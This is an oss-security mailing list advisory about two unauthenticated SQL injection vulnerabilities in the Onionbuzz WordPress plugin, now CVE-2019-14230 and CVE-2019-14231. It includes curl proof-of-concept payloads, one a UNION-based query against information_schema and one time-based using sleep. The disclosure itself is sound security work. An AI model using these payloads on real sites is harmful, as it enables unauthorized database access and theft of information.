'[oss-security] Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Re: Two unauthenticated SQL injection vulnerabilities in Onionbuzz WordPress plugin
From:       Eugene Kolo <eugene () eugenekolo ! com>
Date:       2019-07-23 3:04:25
Message-ID: CAN1YN0tUvJ4mE1WHDBeS_=BRt3M1iZ8p95hP8-3OU=_KgZrF3g () mail ! gmail ! com
[Download RAW message or body]


Assigned CVE-2019-14230 and CVE-2019-14231.

On Sat, Jul 20, 2019 at 6:35 PM Eugene Kolo <eugene@eugenekolo.com> wrote:

> Two unauthenticated/unprivileged SQL injection vulnerabilities in the
> Viral Quiz Maker - Onionbuzz WordPress plugin.
>
> Information
> ===========
> Affected Product: Viral Quiz Maker - OnionBuzz WordPress plugin
> Vendor Homepage: Onionbuzz.com
> Vulnerability Type: SQL Injection
> Discoverer: Eugene Kolodenker
> Date: July-20-2019
>
> 1)
>
> Description
> ===========
> Prior to v1.2.2, you could exploit the `points` parameter in the
> `ob_get_results` ajax nopriv handler due to there being no sanitization on
> the points argument. The points parameter is not sanitized prior to be used
> in a SQL query in getResultByPointsTrivia. This allows an
> unauthenticated/unprivileged user to perform a SQL injection attack capable
> of remote code execution and information disclosure.
>
> Proof of Concept (POC)
> ======================
> ```
> curl http://site/wp-admin/admin-ajax.php?action=ob_get_results --data
> "type=get_result&id=1&quiz_type=5&points=1 or 1=0 union all select
> 1,1,version(),table_name,1,1,1,1,1 from information_schema.tables;#"
> ```
>
> And get back:
> ```
> {"quiz_id":1,"points":"1 or 1=0 union all select
> 1,1,version(),table_name,1,1,1,1,1 from
> information_schema.tables;#","title":<DBVERSION>","description":"CHARACTER_SETS","featured_image":"<img
> src=\"1\">","image_caption":"1","is_image":1,"success":1}
> ```
>
>
> 2)
>
> Description
> ===========
> Prior to v1.2.7, you could exploit the `id` parameter in the `set_count`
> ajax nopriv handler due to there being no sanitization on the id argument.
> The id parameter is not sanitized prior to be used in a SQL query in
> saveQuestionVote. This allows an unauthenticated/unprivileged user to
> perform a SQL injection attack capable of remote code execution and
> information disclosure.
>
>
> Proof of Concept (POC)
> ======================
>
> ```
> curl http://site/wp-admin/admin-ajax.php?type=set_count --data
> "action=ob_question_votes&id=1 or sleep(10);#"
> ```
>
>


[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic